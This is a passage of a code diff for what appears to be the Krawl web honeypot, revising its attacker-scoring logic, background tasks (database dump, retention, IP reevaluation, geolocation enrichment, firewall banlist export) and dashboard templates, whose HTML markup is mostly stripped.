json.dumps(data, indent=2) - - return json.dumps( - {"success": True, "message": "Query executed successfully", "results": []}, - indent=2, - ) diff --git a/src/tasks/analyze_ips.py b/src/tasks/analyze_ips.py index 7602f18..f62df40 100644 --- a/src/tasks/analyze_ips.py +++ b/src/tasks/analyze_ips.py @@ -1,7 +1,5 @@ -from sqlalchemy import select -from typing import Optional -from database import get_database, DatabaseManager -from zoneinfo import ZoneInfo +from collections import Counter +from database import get_database from pathlib import Path from datetime import datetime, timedelta import re @@ -9,8 +7,6 @@ import urllib.parse from wordlists import get_wordlists from config import get_config from logger import get_app_logger -import requests -from 
sanitizer import sanitize_for_storage, sanitize_dict # ---------------------- # TASK CONFIG @@ -74,7 +70,7 @@ def main(): "risky_http_methods": 6, "robots_violations": 4, "uneven_request_timing": 3, - "different_user_agents": 8, + "different_user_agents": 2, "attack_url": 15, }, "good_crawler": { @@ -88,7 +84,7 @@ def main(): "risky_http_methods": 2, "robots_violations": 7, "uneven_request_timing": 0, - "different_user_agents": 5, + "different_user_agents": 7, "attack_url": 5, }, "regular_user": { @@ -99,67 +95,45 @@ def main(): "attack_url": 0, }, } - # Get IPs with recent activity (last minute to match cron schedule) - recent_accesses = db_manager.get_access_logs(limit=999999999, since_minutes=1) - ips_to_analyze = {item["ip"] for item in recent_accesses} + # Parse robots.txt once before the loop (it never changes during a run) + robots_disallows = [] + robots_path = Path(__file__).parent.parent / "templates" / "html" / "robots.txt" + with open(robots_path, "r") as f: + for line in f: + line = line.strip() + if not line: + continue + parts = line.split(":") + if parts[0] == "Disallow": + parts[1] = parts[1].rstrip("/") + robots_disallows.append(parts[1].strip()) + + # Get IPs flagged for reevaluation (set when a suspicious request arrives) + ips_to_analyze = set(db_manager.get_ips_needing_reevaluation()) if not ips_to_analyze: - app_logger.debug("[Background Task] analyze-ips: No recent activity, skipping") + app_logger.debug( + "[Background Task] analyze-ips: No IPs need reevaluation, skipping" + ) return for ip in ips_to_analyze: # Get full history for this IP to perform accurate analysis - ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip) + ip_accesses = db_manager.get_access_logs( + limit=10000, ip_filter=ip, since_minutes=1440 * 30 + ) # look back up to 30 days of history for better accuracy total_accesses_count = len(ip_accesses) if total_accesses_count <= 0: - return + continue - # Set category as "unknown" for the first 3 requests - 
if total_accesses_count < 3: - category = "unknown" - analyzed_metrics = {} - category_scores = { - "attacker": 0, - "good_crawler": 0, - "bad_crawler": 0, - "regular_user": 0, - "unknown": 0, - } - last_analysis = datetime.now() - db_manager.update_ip_stats_analysis( - ip, analyzed_metrics, category, category_scores, last_analysis - ) - return 0 # --------------------- HTTP Methods --------------------- - get_accesses_count = len( - [item for item in ip_accesses if item["method"] == "GET"] - ) - post_accesses_count = len( - [item for item in ip_accesses if item["method"] == "POST"] - ) - put_accesses_count = len( - [item for item in ip_accesses if item["method"] == "PUT"] - ) - delete_accesses_count = len( - [item for item in ip_accesses if item["method"] == "DELETE"] - ) - head_accesses_count = len( - [item for item in ip_accesses if item["method"] == "HEAD"] - ) - options_accesses_count = len( - [item for item in ip_accesses if item["method"] == "OPTIONS"] - ) - patch_accesses_count = len( - [item for item in ip_accesses if item["method"] == "PATCH"] - ) + method_counts = Counter(item["method"] for item in ip_accesses) if total_accesses_count > http_risky_methods_threshold: - http_method_attacker_score = ( - post_accesses_count - + put_accesses_count - + delete_accesses_count - + options_accesses_count - + patch_accesses_count - ) / total_accesses_count + risky_count = sum( + method_counts.get(m, 0) + for m in ("POST", "PUT", "DELETE", "OPTIONS", "PATCH") + ) + http_method_attacker_score = risky_count / total_accesses_count else: http_method_attacker_score = 0 # print(f"HTTP Method attacker score: {http_method_attacker_score}") @@ -174,21 +148,6 @@ def main(): score["bad_crawler"]["risky_http_methods"] = False score["regular_user"]["risky_http_methods"] = False # --------------------- Robots Violations --------------------- - # respect robots.txt and login/config pages access frequency - robots_disallows = [] - robots_path = Path(__file__).parent.parent / 
"templates" / "html" / "robots.txt" - with open(robots_path, "r") as f: - for line in f: - line = line.strip() - if not line: - continue - parts = line.split(":") - - if parts[0] == "Disallow": - parts[1] = parts[1].rstrip("/") - # print(f"DISALLOW {parts[1]}") - robots_disallows.append(parts[1].strip()) - # if 0 100% sure is good crawler, if >10% of robots violated is bad crawler or attacker violated_robots_count = len( [ item @@ -261,7 +220,7 @@ def main(): if len(user_agents_used) >= user_agents_used_threshold: score["attacker"]["different_user_agents"] = True score["good_crawler"]["different_user_agents"] = False - score["bad_crawler"]["different_user_agentss"] = True + score["bad_crawler"]["different_user_agents"] = True score["regular_user"]["different_user_agents"] = False else: score["attacker"]["different_user_agents"] = False diff --git a/src/tasks/db_dump.py b/src/tasks/db_dump.py new file mode 100644 index 0000000..fbc3ef9 --- /dev/null +++ b/src/tasks/db_dump.py @@ -0,0 +1,102 @@ +# tasks/db_dump.py + +from logger import get_app_logger +from database import get_database +from config import get_config +from sqlalchemy import MetaData +from sqlalchemy.schema import CreateTable +import os + +config = get_config() +app_logger = get_app_logger() + +# ---------------------- +# TASK CONFIG +# ---------------------- +TASK_CONFIG = { + "name": "dump-krawl-data", + "cron": f"{config.backups_cron}", + "enabled": config.backups_enabled, + "run_when_loaded": True, +} + + +# ---------------------- +# TASK LOGIC +# ---------------------- +def main(): + """ + Dump krawl database to a sql file for backups + """ + task_name = TASK_CONFIG.get("name") + app_logger.info(f"[Background Task] {task_name} starting...") + + try: + db = get_database() + engine = db._engine + + metadata = MetaData() + metadata.reflect(bind=engine) + + # create backup directory + os.makedirs(config.backups_path, exist_ok=True) + output_file = os.path.join(config.backups_path, "db_dump.sql") + + 
with open(output_file, "w") as f: + # Write header + app_logger.info(f"[Background Task] {task_name} started database dump") + + # Dump schema (CREATE TABLE statements) + f.write("-- Schema\n") + f.write("-- " + "=" * 70 + "\n\n") + + for table_name in metadata.tables: + table = metadata.tables[table_name] + app_logger.info( + f"[Background Task] {task_name} dumping {table} table schema" + ) + + # Create table statement + create_stmt = str(CreateTable(table).compile(engine)) + f.write(f"{create_stmt};\n\n") + + f.write("\n-- Data\n") + f.write("-- " + "=" * 70 + "\n\n") + + with engine.connect() as conn: + for table_name in metadata.tables: + table = metadata.tables[table_name] + + f.write(f"-- Table: {table_name}\n") + + # Select all data from table + result = conn.execute(table.select()) + rows = result.fetchall() + + if rows: + app_logger.info( + f"[Background Task] {task_name} dumping {table} content" + ) + for row in rows: + # Build INSERT statement + columns = ", ".join([col.name for col in table.columns]) + values = ", ".join([repr(value) for value in row]) + f.write( + f"INSERT INTO {table_name} ({columns}) VALUES ({values});\n" + ) + + f.write("\n") + else: + f.write(f"-- No data in {table_name}\n\n") + app_logger.info( + f"[Background Task] {task_name} no data in {table}" + ) + + app_logger.info( + f"[Background Task] {task_name} Database dump completed: {output_file}" + ) + + except Exception as e: + app_logger.error(f"[Background Task] {task_name} failed: {e}") + finally: + db.close_session() diff --git a/src/tasks/db_retention.py b/src/tasks/db_retention.py new file mode 100644 index 0000000..af803c6 --- /dev/null +++ b/src/tasks/db_retention.py @@ -0,0 +1,81 @@ +#!/usr/bin/env python3 + +""" +Database retention task for Krawl honeypot. +Periodically deletes old records based on configured retention_days. 
+""" + +from datetime import datetime, timedelta + +from database import get_database +from logger import get_app_logger + +# ---------------------- +# TASK CONFIG +# ---------------------- + +TASK_CONFIG = { + "name": "db-retention", + "cron": "0 3 * * *", # Run daily at 3 AM + "enabled": True, + "run_when_loaded": False, +} + +app_logger = get_app_logger() + + +def main(): + """ + Delete access logs, credential attempts, and attack detections + older than the configured retention period. + """ + try: + from config import get_config + from models import AccessLog, CredentialAttempt, AttackDetection + + config = get_config() + retention_days = config.database_retention_days + + db = get_database() + session = db.session + + cutoff = datetime.now() - timedelta(days=retention_days) + + # Delete attack detections linked to old access logs first (FK constraint) + old_log_ids = session.query(AccessLog.id).filter(AccessLog.timestamp < cutoff) + detections_deleted = ( + session.query(AttackDetection) + .filter(AttackDetection.access_log_id.in_(old_log_ids)) + .delete(synchronize_session=False) + ) + + # Delete old access logs + logs_deleted = ( + session.query(AccessLog) + .filter(AccessLog.timestamp < cutoff) + .delete(synchronize_session=False) + ) + + # Delete old credential attempts + creds_deleted = ( + session.query(CredentialAttempt) + .filter(CredentialAttempt.timestamp < cutoff) + .delete(synchronize_session=False) + ) + + session.commit() + + if logs_deleted or creds_deleted or detections_deleted: + app_logger.info( + f"DB retention: Deleted {logs_deleted} access logs, " + f"{detections_deleted} attack detections, " + f"{creds_deleted} credential attempts older than {retention_days} days" + ) + + except Exception as e: + app_logger.error(f"Error during DB retention cleanup: {e}") + finally: + try: + db.close_session() + except Exception as e: + app_logger.error(f"Error closing DB session after retention cleanup: {e}") diff --git a/src/tasks/fetch_ip_rep.py 
b/src/tasks/fetch_ip_rep.py index eac6645..ddaea49 100644 --- a/src/tasks/fetch_ip_rep.py +++ b/src/tasks/fetch_ip_rep.py @@ -2,7 +2,7 @@ from database import get_database from logger import get_app_logger import requests from sanitizer import sanitize_for_storage, sanitize_dict -from geo_utils import get_most_recent_geoip_data, extract_city_from_coordinates +from geo_utils import extract_geolocation_from_ip, fetch_blocklist_data # ---------------------- # TASK CONFIG @@ -27,34 +27,51 @@ def main(): ) for ip in unenriched_ips: try: - api_url = "https://iprep.lcrawl.com/api/iprep/" - params = {"cidr": ip} - headers = {"Content-Type": "application/json"} - response = requests.get(api_url, headers=headers, params=params, timeout=10) - payload = response.json() + # Fetch geolocation data using ip-api.com + geoloc_data = extract_geolocation_from_ip(ip) - if payload.get("results"): - results = payload["results"] + # Fetch blocklist data from lcrawl API + blocklist_data = fetch_blocklist_data(ip) - # Get the most recent result (first in list, sorted by record_added) - most_recent = results[0] - geoip_data = most_recent.get("geoip_data", {}) - list_on = most_recent.get("list_on", {}) + if geoloc_data: + # Extract fields from the new API response + country_iso_code = geoloc_data.get("country_code") + country = geoloc_data.get("country") + region = geoloc_data.get("region") + region_name = geoloc_data.get("region_name") + city = geoloc_data.get("city") + timezone = geoloc_data.get("timezone") + isp = geoloc_data.get("isp") + reverse = geoloc_data.get("reverse") + asn = geoloc_data.get("asn") + asn_org = geoloc_data.get("org") + latitude = geoloc_data.get("latitude") + longitude = geoloc_data.get("longitude") + is_proxy = geoloc_data.get("is_proxy", False) + is_hosting = geoloc_data.get("is_hosting", False) - # Extract standard fields - country_iso_code = geoip_data.get("country_iso_code") - asn = geoip_data.get("asn_autonomous_system_number") - asn_org = 
geoip_data.get("asn_autonomous_system_organization") - latitude = geoip_data.get("location_latitude") - longitude = geoip_data.get("location_longitude") + # Use blocklist data if available, otherwise create default with flags + if blocklist_data: + list_on = blocklist_data + else: + list_on = {} - # Extract city from coordinates using reverse geocoding - city = extract_city_from_coordinates(geoip_data) + # Add flags to list_on + list_on["is_proxy"] = is_proxy + list_on["is_hosting"] = is_hosting sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3) + sanitized_country = sanitize_for_storage(country, 100) + sanitized_region = sanitize_for_storage(region, 2) + sanitized_region_name = sanitize_for_storage(region_name, 100) sanitized_asn = sanitize_for_storage(asn, 100) sanitized_asn_org = sanitize_for_storage(asn_org, 100) sanitized_city = sanitize_for_storage(city, 100) if city else None + sanitized_timezone = sanitize_for_storage(timezone, 50) + sanitized_isp = sanitize_for_storage(isp, 100) + sanitized_reverse = ( + sanitize_for_storage(reverse, 255) if reverse else None + ) sanitized_list_on = sanitize_dict(list_on, 100000) db_manager.update_ip_rep_infos( @@ -63,11 +80,19 @@ def main(): sanitized_asn, sanitized_asn_org, sanitized_list_on, - sanitized_city, - latitude, - longitude, + city=sanitized_city, + latitude=latitude, + longitude=longitude, + country=sanitized_country, + region=sanitized_region, + region_name=sanitized_region_name, + timezone=sanitized_timezone, + isp=sanitized_isp, + reverse=sanitized_reverse, + is_proxy=is_proxy, + is_hosting=is_hosting, ) except requests.RequestException as e: - app_logger.warning(f"Failed to fetch IP rep for {ip}: {e}") + app_logger.warning(f"Failed to fetch geolocation for {ip}: {e}") except Exception as e: app_logger.error(f"Error processing IP {ip}: {e}") diff --git a/src/tasks/flag_stale_ips.py b/src/tasks/flag_stale_ips.py new file mode 100644 index 0000000..0428e15 --- /dev/null +++ 
b/src/tasks/flag_stale_ips.py @@ -0,0 +1,46 @@ +from database import get_database +from logger import get_app_logger + +# ---------------------- +# TASK CONFIG +# ---------------------- + +TASK_CONFIG = { + "name": "flag-stale-ips", + "cron": "0 2 * * *", # Run daily at 2 AM + "enabled": True, + "run_when_loaded": True, +} + +# Set to True to force all IPs to be flagged for reevaluation on next run. +# Resets to False automatically after execution. +FORCE_IP_RESCAN = False + + +def main(): + global FORCE_IP_RESCAN + + app_logger = get_app_logger() + db = get_database() + + try: + if FORCE_IP_RESCAN: + count = db.flag_all_ips_for_reevaluation() + FORCE_IP_RESCAN = False + app_logger.info( + f"[Background Task] flag-stale-ips: FORCE RESCAN - Flagged {count} IPs for reevaluation" + ) + else: + count = db.flag_stale_ips_for_reevaluation() + if count > 0: + app_logger.info( + f"[Background Task] flag-stale-ips: Flagged {count} stale IPs for reevaluation" + ) + else: + app_logger.debug( + "[Background Task] flag-stale-ips: No stale IPs found to flag" + ) + except Exception as e: + app_logger.error( + f"[Background Task] flag-stale-ips: Error flagging stale IPs: {e}" + ) diff --git a/src/tasks/memory_cleanup.py b/src/tasks/memory_cleanup.py index 38a27a2..dc230fd 100644 --- a/src/tasks/memory_cleanup.py +++ b/src/tasks/memory_cleanup.py @@ -2,10 +2,12 @@ """ Memory cleanup task for Krawl honeypot. -Periodically trims unbounded in-memory structures to prevent OOM. + +NOTE: This task is no longer needed. Ban/rate-limit state has been moved from +in-memory ip_page_visits dict to the ip_stats DB table, eliminating unbounded +memory growth. Kept disabled for reference. 
""" -from database import get_database from logger import get_app_logger # ---------------------- @@ -14,8 +16,8 @@ from logger import get_app_logger TASK_CONFIG = { "name": "memory-cleanup", - "cron": "*/5 * * * *", # Run every 5 minutes - "enabled": True, + "cron": "*/5 * * * *", + "enabled": False, "run_when_loaded": False, } @@ -23,49 +25,4 @@ app_logger = get_app_logger() def main(): - """ - Clean up in-memory structures in the tracker. - Called periodically to prevent unbounded memory growth. - """ - try: - # Import here to avoid circular imports - from handler import Handler - - if not Handler.tracker: - app_logger.warning("Tracker not initialized, skipping memory cleanup") - return - - # Get memory stats before cleanup - stats_before = Handler.tracker.get_memory_stats() - - # Run cleanup - Handler.tracker.cleanup_memory() - - # Get memory stats after cleanup - stats_after = Handler.tracker.get_memory_stats() - - # Log changes - access_log_reduced = ( - stats_before["access_log_size"] - stats_after["access_log_size"] - ) - cred_reduced = ( - stats_before["credential_attempts_size"] - - stats_after["credential_attempts_size"] - ) - - if access_log_reduced > 0 or cred_reduced > 0: - app_logger.info( - f"Memory cleanup: Trimmed {access_log_reduced} access logs, " - f"{cred_reduced} credential attempts" - ) - - # Log current memory state for monitoring - app_logger.debug( - f"Memory stats after cleanup: " - f"access_logs={stats_after['access_log_size']}, " - f"credentials={stats_after['credential_attempts_size']}, " - f"unique_ips={stats_after['unique_ips_tracked']}" - ) - - except Exception as e: - app_logger.error(f"Error during memory cleanup: {e}") + app_logger.debug("memory-cleanup task is disabled (ban state now in DB)") diff --git a/src/tasks/top_attacking_ips.py b/src/tasks/top_attacking_ips.py index c0cfbec..69d417b 100644 --- a/src/tasks/top_attacking_ips.py +++ b/src/tasks/top_attacking_ips.py @@ -4,9 +4,14 @@ import os from logger import 
get_app_logger
 from database import get_database
 from config import get_config
-from models import IpStats
+from models import IpStats, AccessLog
 from ip_utils import is_valid_public_ip
+from sqlalchemy import distinct
+from firewall.fwtype import FWType
+from firewall.iptables import Iptables
+from firewall.raw import Raw
 
+config = get_config()
 app_logger = get_app_logger()
 
 # ----------------------
@@ -20,7 +25,6 @@ TASK_CONFIG = {
 }
 
-EXPORTS_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "exports")
-OUTPUT_FILE = os.path.join(EXPORTS_DIR, "malicious_ips.txt")
+EXPORTS_DIR = config.exports_path
 
 
 # ----------------------
@@ -48,7 +52,6 @@ def main():
         )
 
         # Filter out local/private IPs and the server's own IP
-        config = get_config()
         server_ip = config.get_server_ip()
 
         public_ips = [
@@ -61,14 +64,24 @@ def main():
         os.makedirs(EXPORTS_DIR, exist_ok=True)
 
         # Write IPs to file (one per line)
-        with open(OUTPUT_FILE, "w") as f:
-            for ip in public_ips:
-                f.write(f"{ip}\n")
+        for fwname in FWType._registry:
 
-        app_logger.info(
-            f"[Background Task] {task_name} exported {len(public_ips)} attacker IPs "
-            f"(filtered {len(attackers) - len(public_ips)} local/private IPs) to {OUTPUT_FILE}"
-        )
+            # Ask this firewall backend for its banlist built from the public IPs
+            fw = FWType.create(fwname)
+            banlist = fw.getBanlist(public_ips)
+
+            output_file = os.path.join(EXPORTS_DIR, f"{fwname}_banlist.txt")
+            # The raw list keeps malicious_ips.txt, the name this task wrote before
+            if fwname == "raw":
+                output_file = os.path.join(EXPORTS_DIR, "malicious_ips.txt")
+
+            with open(output_file, "w") as f:
+                f.write(f"{banlist}\n")
+
+            app_logger.info(
+                f"[Background Task] {task_name} exported {len(public_ips)} public IPs in {fwname} format "
+                f"(filtered {len(attackers) - len(public_ips)} local/private IPs) to {output_file}"
+            )
 
     except Exception as e:
         app_logger.error(f"[Background Task] {task_name} failed: {e}")
diff --git a/src/tasks_master.py b/src/tasks_master.py
index 9017c49..1f910f0 100644
--- a/src/tasks_master.py
+++ b/src/tasks_master.py
@@ -40,7 +40,6 @@ class TasksMaster:
     def
__init__(self, scheduler: BackgroundScheduler): self.tasks = self._config_tasks() self.scheduler = scheduler - self.last_run_times = {} self.scheduler.add_listener( self.job_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR ) @@ -234,9 +233,6 @@ class TasksMaster: app_logger.error(f"Failed to load {module_name}: {e}") def job_listener(self, event): - job_id = event.job_id - self.last_run_times[job_id] = datetime.datetime.now() - if event.exception: app_logger.error(f"Job {event.job_id} failed: {event.exception}") else: diff --git a/src/templates/dashboard_template.py b/src/templates/dashboard_template.py deleted file mode 100644 index 89ca4fb..0000000 --- a/src/templates/dashboard_template.py +++ /dev/null @@ -1,2665 +0,0 @@ -#!/usr/bin/env python3 - -""" -Dashboard template for viewing honeypot statistics. -Customize this template to change the dashboard appearance. -""" - -import html -from datetime import datetime -from zoneinfo import ZoneInfo - - -def _escape(value) -> str: - """Escape HTML special characters to prevent XSS attacks.""" - if value is None: - return "" - return html.escape(str(value)) - - -def format_timestamp(iso_timestamp: str, time_only: bool = False) -> str: - """Format ISO timestamp for display with timezone conversion - - Args: - iso_timestamp: ISO format timestamp string (UTC) - time_only: If True, return only HH:MM:SS, otherwise full datetime - """ - try: - # Parse UTC timestamp - dt = datetime.fromisoformat(iso_timestamp) - if time_only: - return dt.strftime("%H:%M:%S") - return dt.strftime("%Y-%m-%d %H:%M:%S") - except Exception: - # Fallback for old format - return ( - iso_timestamp.split("T")[1][:8] if "T" in iso_timestamp else iso_timestamp - ) - - -def generate_dashboard(stats: dict, dashboard_path: str = "") -> str: - """Generate dashboard HTML with access statistics - - Args: - stats: Statistics dictionary - dashboard_path: The secret dashboard path for generating API URLs - """ - - # Generate suspicious accesses rows with clickable 
IPs - suspicious_rows = ( - "\n".join([f""" - {_escape(log["ip"])} - {_escape(log["path"])} - {_escape(log["user_agent"][:60])} - {format_timestamp(log["timestamp"], time_only=True)} - - - -
-
Loading stats...
-
- - """ for log in stats["recent_suspicious"][-10:]]) - or 'No suspicious activity detected' - ) - - return f""" - - - - Krawl Dashboard - - - - - - - -
- - -

Krawl Dashboard

- -
-
-
{stats['total_accesses']}
-
Total Accesses
-
-
-
{stats['unique_ips']}
-
Unique IPs
-
-
-
{stats['unique_paths']}
-
Unique Paths
-
-
-
{stats['suspicious_accesses']}
-
Suspicious Accesses
-
-
-
{stats.get('honeypot_ips', 0)}
-
Honeypot Caught
-
-
-
{len(stats.get('credential_attempts', []))}
-
Credentials Captured
-
-
-
{stats.get('unique_attackers', 0)}
-
Unique Attackers
-
-
- - - -
-
-

Recent Suspicious Activity

- - - - - - - - - - - {suspicious_rows} - -
IP AddressPathUser-AgentTime
-
- -
-
-

Honeypot Triggers by IP

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - -
#IP AddressAccessed PathsCount
Loading...
-
- -
-
-
-

Top IP Addresses

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - -
#IP AddressAccess Count
Loading...
-
- -
-
-

Top User-Agents

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - -
#User-AgentCount
Loading...
-
-
-
- -
-
-
-

IP Origins Map

-
- - - - - -
-
-
-
Loading map...
-
-
- -
-
-

Attackers by Total Requests

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - - -
#IP AddressTotal RequestsFirst SeenLast SeenLocation
-
- -
-
-

Captured Credentials

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - -
#IP AddressUsernamePasswordPathTime
Loading...
-
- -
-
-

Detected Attack Types

-
-
- Page 1/1 - - 0 total -
- - -
-
- - - - - - - - - - - - - - -
#IP AddressPathAttack TypesUser-AgentTime
Loading...
-
- -
-
-

Most Recurring Attack Types

-
Top 10 Attack Vectors
-
-
- -
-
-
- -
-
- -
- -
-
-
-
- - - -""" diff --git a/src/templates/jinja2/base.html b/src/templates/jinja2/base.html new file mode 100644 index 0000000..22105c4 --- /dev/null +++ b/src/templates/jinja2/base.html @@ -0,0 +1,28 @@ + + + + + + Krawl Dashboard + + + + + + + + + + + + + + {% block content %}{% endblock %} + + + + + + {% block scripts %}{% endblock %} + + diff --git a/src/templates/jinja2/dashboard/index.html b/src/templates/jinja2/dashboard/index.html new file mode 100644 index 0000000..fef46c6 --- /dev/null +++ b/src/templates/jinja2/dashboard/index.html @@ -0,0 +1,191 @@ +{% extends "base.html" %} + +{% block content %} +
+ + {# GitHub logo #} + + + {# Banlist export dropdown - Alpine.js #} +
+
+ + +
+
+ +

Krawl Dashboard

+ + {# Stats cards - server-rendered #} + {% include "dashboard/partials/stats_cards.html" %} + + {# Search bar #} +
+ +
+
+ + {# Tab navigation - Alpine.js #} + + + {# ==================== OVERVIEW TAB ==================== #} +
+ + {# Map section #} + {% include "dashboard/partials/map_section.html" %} + + {# Suspicious Activity - server-rendered (last 10 requests) #} + {% include "dashboard/partials/suspicious_table.html" %} + + {# Top IPs + Top User-Agents side by side #} +
+
+

Top IP Addresses

+
+
Loading...
+
+
+
+

Top User-Agents

+
+
Loading...
+
+
+
+ + {# Top Paths #} +
+

Top Paths

+
+
Loading...
+
+
+
+ + {# ==================== ATTACKS TAB ==================== #} +
+ + {# Attackers table - HTMX loaded #} +
+

Attackers by Total Requests

+
+
Loading...
+
+
+ + {# Credentials table #} +
+

Captured Credentials

+
+
Loading...
+
+
+ + {# Honeypot Triggers - HTMX loaded #} +
+

Honeypot Triggers by IP

+
+
Loading...
+
+
+ + {# Attack Types table #} +
+

Detected Attack Types

+
+
Loading...
+
+
+ + {# Charts + Patterns side by side #} +
+
+

Most Recurring Attack Types

+
+ +
+
+
+

Most Recurring Attack Patterns

+
+
Loading...
+
+
+
+
+ + {# ==================== IP INSIGHT TAB ==================== #} +
+ {# IP Insight content - loaded via HTMX when IP is selected #} +
+ +
+
+
+ + {# Raw request modal - Alpine.js #} + {% include "dashboard/partials/raw_request_modal.html" %} + +
+{% endblock %} diff --git a/src/templates/jinja2/dashboard/ip.html b/src/templates/jinja2/dashboard/ip.html new file mode 100644 index 0000000..d09ad88 --- /dev/null +++ b/src/templates/jinja2/dashboard/ip.html @@ -0,0 +1,38 @@ +{% extends "base.html" %} + +{% block content %} +
+ + {# GitHub logo #} + + + {# Back to dashboard link #} + + + {% set uid = "ip" %} + {% include "dashboard/partials/_ip_detail.html" %} + + {# Raw Request Modal #} +
+
+
+

Raw Request

+ × +
+
+

+            
+ +
+
+
+{% endblock %} diff --git a/src/templates/jinja2/dashboard/partials/_ip_detail.html b/src/templates/jinja2/dashboard/partials/_ip_detail.html new file mode 100644 index 0000000..1812b1d --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/_ip_detail.html @@ -0,0 +1,295 @@ +{# Shared IP detail content – included by ip.html and ip_insight.html. + Expects: stats, ip_address, dashboard_path, uid (unique prefix for element IDs) #} + +{# Page header #} +
+

+ {{ ip_address }} + {% if stats.category %} + + {{ stats.category | replace('_', ' ') | title }} + + {% endif %} +

+ {% if stats.city or stats.country %} +

+ {{ stats.city | default('') }}{% if stats.city and stats.country %}, {% endif %}{{ stats.country | default(stats.country_code | default('')) }} +

+ {% endif %} +
+ +{# ── Two-column layout: Info + Radar/Timeline ───── #} +
+ {# Left column: single IP Information card #} +
+
+

IP Information

+ + {# Activity section #} +

Activity

+
+
+
Total Requests
+
{{ stats.total_requests | default('N/A') }}
+
+
+
First Seen
+
{{ stats.first_seen | format_ts }}
+
+
+
Last Seen
+
{{ stats.last_seen | format_ts }}
+
+ {% if stats.last_analysis %} +
+
Last Analysis
+
{{ stats.last_analysis | format_ts }}
+
+ {% endif %} +
+ + {# Geo & Network section #} +

Geo & Network

+
+ {% if stats.city or stats.country %} +
+
Location
+
{{ stats.city | default('') | e }}{% if stats.city and stats.country %}, {% endif %}{{ stats.country | default(stats.country_code | default('')) | e }}
+
+ {% endif %} + {% if stats.region_name %} +
+
Region
+
{{ stats.region_name | e }}
+
+ {% endif %} + {% if stats.timezone %} +
+
Timezone
+
{{ stats.timezone | e }}
+
+ {% endif %} + {% if stats.isp %} +
+
ISP
+
{{ stats.isp | e }}
+
+ {% endif %} + {% if stats.asn_org %} +
+
Organization
+
{{ stats.asn_org | e }}
+
+ {% endif %} + {% if stats.asn %} +
+
ASN
+
AS{{ stats.asn }}
+
+ {% endif %} + {% if stats.reverse_dns %} +
+
Reverse DNS
+
{{ stats.reverse_dns | e }}
+
+ {% endif %} +
+ + {# Reputation section #} +

Reputation

+
+ {# Flags #} + {% set flags = [] %} + {% if stats.is_proxy %}{% set _ = flags.append('Proxy') %}{% endif %} + {% if stats.is_hosting %}{% set _ = flags.append('Hosting') %}{% endif %} + {% if flags %} +
+ Flags +
+ {% for flag in flags %} + {{ flag }} + {% endfor %} +
+
+ {% endif %} + + {# Blocklists #} +
+ Listed On + {% if stats.blocklist_memberships %} +
+ {% for bl in stats.blocklist_memberships %} + {{ bl | e }} + {% endfor %} +
+ {% else %} + Clean + {% endif %} +
+
+
+
+ + {# Right column: Category Analysis + Timeline + Attack Types #} +
+ {% if stats.category_scores %} +
+

Category Analysis

+
+
+
+
+ {% endif %} + + {# Bottom row: Behavior Timeline + Attack Types side by side #} +
+ {% if stats.category_history %} +
+

Behavior Timeline

+
+
+ {% for entry in stats.category_history %} +
+
+
+ {{ entry.new_category | default('unknown') | replace('_', ' ') | title }} + {% if entry.old_category %} + from {{ entry.old_category | replace('_', ' ') | title }} + {% else %} + initial classification + {% endif %} + {{ entry.timestamp | format_ts }} +
+
+ {% endfor %} +
+
+
+ {% endif %} + +
+

Attack Types

+
+ +
+
+
+
+
+ +{# Location map #} +{% if stats.latitude and stats.longitude %} +
+

Location

+
+
+{% endif %} + +{# Detected Attack Types table – only for attackers #} +{% if stats.category and stats.category | lower == 'attacker' %} +
+

Detected Attack Types

+
+
Loading...
+
+
+{% endif %} + +{# Access History table #} +
+

Access History

+
+
Loading...
+
+
+ +{# Inline init script #} + diff --git a/src/templates/jinja2/dashboard/partials/access_by_ip_table.html b/src/templates/jinja2/dashboard/partials/access_by_ip_table.html new file mode 100644 index 0000000..5e7bd6c --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/access_by_ip_table.html @@ -0,0 +1,63 @@ +{# HTMX fragment: Detected Access logs by ip table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + {% for log in items %} + + + + + + + + + + + {% else %} + + {% endfor %} + +
#PathUser-Agent + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} +
+ {{ log.path | e }} + {% if log.path | length > 30 %} +
{{ log.path | e }}
+ {% endif %} +
+
{{ (log.user_agent | default(''))[:50] | e }}{{ log.timestamp | format_ts }} + {% if log.id %} + + {% endif %} +
No logs detected
diff --git a/src/templates/jinja2/dashboard/partials/attack_types_table.html b/src/templates/jinja2/dashboard/partials/attack_types_table.html new file mode 100644 index 0000000..4ac3369 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/attack_types_table.html @@ -0,0 +1,83 @@ +{# HTMX fragment: Detected Attack Types table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} total +
+ + +
+
+ + + + + + + + + + + + + + {% for attack in items %} + + + + + + + + + + + + + {% else %} + + {% endfor %} + +
#IP AddressPathAttack TypesUser-Agent + Time +
{{ loop.index + (pagination.page - 1) * pagination.page_size }} + {{ attack.ip | e }} + +
+ {{ attack.path | e }} + {% if attack.path | length > 30 %} +
{{ attack.path | e }}
+ {% endif %} +
+
+
+ {{ attack.attack_type | e }} + {% if attack.attack_type | length > 30 %} +
{{ attack.attack_type | e }}
+ {% endif %} +
+
{{ (attack.user_agent | default(''))[:50] | e }}{{ attack.timestamp | format_ts }} + {% if attack.log_id %} + + {% endif %} + +
No attacks detected
diff --git a/src/templates/jinja2/dashboard/partials/attackers_table.html b/src/templates/jinja2/dashboard/partials/attackers_table.html new file mode 100644 index 0000000..1bcbb40 --- /dev/null +++ b/src/templates/jinja2/dashboard/partials/attackers_table.html @@ -0,0 +1,74 @@ +{# HTMX fragment: Attackers table #} +
+ Page {{ pagination.page }}/{{ pagination.total_pages }} — {{ pagination.total }} attackers +
+ + +
+
